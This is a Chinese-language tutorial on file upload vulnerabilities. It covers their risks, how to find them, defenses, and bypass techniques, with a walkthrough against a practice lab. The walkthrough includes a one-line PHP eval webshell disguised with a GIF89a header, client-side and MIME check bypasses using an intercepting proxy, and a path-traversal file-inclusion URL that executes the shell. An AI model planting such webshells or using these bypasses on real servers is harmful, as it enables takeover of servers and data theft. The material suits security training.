文件上传漏洞简述

什么是文件上传漏洞？
凡是存在文件上传的地方均有可能存在文件上传漏洞，关于上传文件操作的时候对方代码写的是否完整、是否安全，一旦疏忽了某个地方可能会造成文件上传漏洞。

文件上传的原理

网站Web应用都有一些文件上传功能，比如文档、图片、头像、视频上传，当上传功能的实现代码没有严格校验上传文件的后缀和文件类型，此时攻击者就可以上传一个webshell到一个Web可访问的目录上，并将恶意文件传递给如PHP解释器去执行，之后就可以在服务器上执行恶意代码，进行数据库执行、服务器文件管理，服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护

文件上传漏洞有哪些危害

文件可以自定义，可以成为Webshell,通过文件上传来上传后门，直接获取网站权限，属于高危漏洞。上传漏洞与SQL注入或者XSS相比，其风险更大。可以获取数据库信息，可以对服务器提权，获取内网权限。

文件上传漏洞如何查找及判断

1.黑盒查找

文件后台

        进入网站后台不一定能获得网站权限，可以从后台获取网站权限

会员中心

        通过图片上传

文件扫描

        使用工具扫描出后台路径

2.白盒查找

        通过代码分析到上传漏洞

        查找文件上传功能

文件上传如何防御

将上传文件与web服务隔离
使用白名单过滤、限制上传文件类型
文件上传路径设置为不可执行权限
检查文件上传路径
自带函数检测，自定义函数检测
图片渲染对上传文件重命名
对文件内容压缩，重新生成文件内容检查文件内容

文件上传漏洞绕过的方式有哪些

文件包含绕过
前端限制绕过
文件扩展名绕过
ashx上传绕过
特殊文件名绕过
00截断绕过上传
htaccess解析漏洞
突破MIME限制上传
解析漏洞绕过
条件竞争绕过
CONTENT-LENGTH绕过

一、 client check（客户端检测）

说明：在前端通过js脚本对上传文件的后缀名进行验证，通过设置黑、白名单限制用户上传的文件类型。这种验证方式很不安全，很容易被绕过。可以通过拦截修改数据包轻松绕过，甚至直接在浏览器关闭js都可以绕过。

（1）这里设置了白名单，所以直接将一句话木马改成jpg后缀上传

（2）bp抓包，将后缀修改回php后，放包上传

（3）上传成功，得到文件保存路径为uploads/qjkhcmd.php（很多实际情况并不会返回文件保存的路径，需要自己爆破或猜解获得）

（4）用蚁剑进行连接
成功连接：

二、MIME type服务端检测

说明：服务端会对上传的数据中的content-type字段进行检测，判断其是否为指定的文件格式。

（1）绕过只需要抓包将字段修改为image/jpeg图片类型即可（你开始上传的是图片，就自动变成image/jpeg的类型了），绕过的步骤和上面一样：抓包，修改后缀以及content-type字段，放包，蚁剑连接就行。

这里就不放连接shell的截图了

三、getimagesize()检测

说明：getimagesize函数会去读取文件头部的几个字符串，判断是否为正常图片的开头（各种文件头都是有固定格式，jpg、png等图片都有自己的文件头）

这种方式只能将含有一句话木马的图片上传至服务器端，不能解析，所以要利用文件包含漏洞包含上传的图片，将其解析。

文件包含漏洞

程序开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件，而无需再次编写，这中文件调用的过程一般被称为文件包含。服务器解析执行php文件时能通过包含函数加载另外一个文件中的php代码，当被包含的文件中存在木马时，木马就能被成功执行。

所以，这题可以采用制作图片马，利用文件包含漏洞，让图片中的木马解析成功。

（1）步骤：在一句话木马前面添加GIF89a（这是GIF图片文件头，我上面的实验都用的这种形式的一句话木马）

代码如下：

php">GIF89a
<?=@eval($_POST['cmd']);

发现上传成功

利用靶场的文件包含漏洞进行利用

拼接url如下：

php">http://xxxxx/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/05/10/233506645b518282129043202491.jpg&submit=%E6%8F%90%E4%BA%A4

这个路径是根据上面已经连接的shell拼接出来的，实战环境中只能自己去试它的相对路径